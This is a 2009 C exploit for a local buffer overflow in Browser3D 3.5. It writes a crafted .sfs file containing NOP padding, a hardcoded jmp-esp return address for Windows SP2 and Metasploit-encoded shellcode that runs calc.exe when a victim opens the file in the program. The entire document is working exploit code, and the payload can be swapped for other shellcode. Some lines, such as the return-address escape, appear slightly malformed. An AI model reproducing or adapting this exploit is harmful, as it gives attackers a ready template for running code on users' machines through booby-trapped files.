Browser3D version 3.5 local buffer overflow exploit that spawns calc.exe
Source: maroc-anti-connexion[at]hotmail.com  Author: SimO-s0fT  Published: 2009-01-22
#include<stdio.h>
#include<string.h>
#include<windows.h>

/* Browser3D local BOF exploit
 * coded by SimO-s0fT (maroc-anti-connexion@hotmail.com)
 * greetz to: all friends & all Moroccan hackers
 * special tnx for ZAML str0ke
 */
/* win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com */
unsigned char scode[] =
"\x2b\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xc2"
"\xf8\x23\x02\x83\xeb\xfc\xe2\xf4\x3e\x10\x67\x02\xc2\xf8\xa8\x47"
"\xfe\x73\x5f\x07\xba\xf9\xcc\x89\x8d\xe0\xa8\x5d\xe2\xf9\xc8\x4b"
"\x49\xcc\xa8\x03\x2c\xc9\xe3\x9b\x6e\x7c\xe3\x76\xc5\x39\xe9\x0f"
"\xc3\x3a\xc8\xf6\xf9\xac\x07\x06\xb7\x1d\xa8\x5d\xe6\xf9\xc8\x64"
"\x49\xf4\x68\x89\x9d\xe4\x22\xe9\x49\xe4\xa8\x03\x29\x71\x7f\x26"
"\xc6\x3b\x12\xc2\xa6\x73\x63\x32\x47\x38\x5b\x0e\x49\xb8\x2f\x89"
"\xb2\xe4\x8e\x89\xaa\xf0\xc8\x0b\x49\x78\x93\x02\xc2\xf8\xa8\x6a"
"\xfe\xa7\x12\xf4\xa2\xae\xaa\xfa\x41\x38\x58\x52\xaa\x08\xa9\x06"
"\x9d\x90\xbb\xfc\x48\xf6\x74\xfd\x25\x9b\x42\x6e\xa1\xf8\x23\x02";
int main(int argc,char *argv[]){
    printf("\t ===>viva marrakesh city<===\t\n");
    FILE *openfile;
    char exploit[430];
    char junk[262];
    char ret[]="\x68\xD5\x85\7C";//jmp kernel32.dll esp (windows trust sp2)
    char nop[]="\x90\x90\x90\x90";
    memset(junk,0x90,262);
    memcpy(exploit,junk,strlen(junk));
    memcpy(exploit+strlen(junk),ret,strlen(ret));
    memcpy(exploit+strlen(junk)+strlen(ret),nop,strlen(nop));
    memcpy(exploit+strlen(junk)+strlen(ret)+strlen(nop),scode,160);
    openfile=fopen("simo.sfs","wb");
    if(openfile==NULL){ perror("can't opening this file\n"); }
    fwrite(exploit,1,sizeof(exploit),openfile);
    fclose(openfile);
    printf("file created ....!"
                 "open it whit Browser3d");
    return 0;
}